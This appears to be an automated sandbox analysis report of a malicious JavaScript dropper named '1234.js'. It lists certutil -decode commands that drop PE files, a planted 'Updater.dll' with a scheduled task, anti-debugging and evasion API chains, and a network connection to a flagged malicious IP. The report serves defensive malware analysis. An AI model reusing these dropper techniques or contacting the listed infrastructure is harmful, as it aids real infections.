Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A5113A0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,sprintf_s,FindFirstFileW,FindNextFileW,FindClose, 11_2_00007FFE1A5113A0
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Source: 1234.js Array : entropy: 5.18, length: 17418, content: '|LJAAA8AAA''(\x27pm\x27);t0=''Zvcm1hdG|d''ol1hIl0JHh''BIjRVRuAAA''Xb/Xa\x27);t0''ACjMAQABIw''a\x27) Go to definition
Drops PE files
Source: C:\Windows\System32\certutil.exe File created: C:\Users\user\AppData\Local\Temp\rad00257.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\ProgramData\Tyrannosaurus Tech\Updater.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\System32\msiexec.exe File created: C:\ProgramData\Tyrannosaurus Tech\Updater.dll Jump to dropped file
Creates job files (autostart)
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Tasks\Tyrannosaurus Tech.job Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Uses certutil -decode
Source: unknown Process created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp
Source: unknown Process created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A515E70 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress, 11_2_00007FFE1A515E70
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\System32\rundll32.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\certutil.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rad00257.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\ProgramData\Tyrannosaurus Tech\Updater.dll Jump to dropped file
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\rundll32.exe Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A5113A0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,sprintf_s,FindFirstFileW,FindNextFileW,FindClose, 11_2_00007FFE1A5113A0
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A511870 GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 11_2_00007FFE1A511870
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A51E994 IsDebuggerPresent,__crtUnhandledException, 11_2_00007FFE1A51E994
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A52036C EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 11_2_00007FFE1A52036C
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A5113A0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,sprintf_s,FindFirstFileW,FindNextFileW,FindClose, 11_2_00007FFE1A5113A0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A51B5A8 GetProcessHeap, 11_2_00007FFE1A51B5A8
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A51C538 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00007FFE1A51C538

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exe Network Connect: 185.161.251.26 443 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A51BDA8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 11_2_00007FFE1A51BDA8
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A5145E0 GetVolumeInformationW,GetModuleHandleW,GetComputerNameW,GetModuleHandleW,GetComputerNameExW,GetModuleHandleW,GetUserNameW,GetModuleHandleW,OpenMutexW,CloseHandle,GetModuleHandleW,GetTickCount,SleepEx, 11_2_00007FFE1A5145E0
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A515A20 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,GetSystemInfo,GetSystemMetrics, 11_2_00007FFE1A515A20
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1541406 Sample: 1234.js Startdate: 24/10/2024 Architecture: WINDOWS Score: 76 27 JavaScript source code contains functionality to generate code involving a shell, file or stream 2->27 29 Uses certutil -decode 2->29 31 Sigma detected: WScript or CScript Dropper 2->31 33 Potential obfuscated javascript found 2->33 6 rundll32.exe 6 2->6         started        10 wscript.exe 1 1 2->10         started        12 certutil.exe 2 2->12         started        15 3 other processes 2->15 process3 dnsIp4 25 185.161.251.26, 443, 50002, 50003 NTLGB United Kingdom 6->25 35 System process connects to network (likely due to code injection or exploit) 6->35 37 Found evasive API chain (may stop execution after checking mutex) 6->37 39 JScript performs obfuscated calls to suspicious functions 10->39 21 C:\Users\user\AppData\Local\...\rad00257.tmp, PE32+ 12->21 dropped 17 conhost.exe 12->17         started        23 C:\ProgramData\...\Updater.dll, PE32+ 15->23 dropped 19 conhost.exe 15->19         started        file5 signatures6 process7
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.161.251.26
 unknown United Kingdom
5089 NTLGB true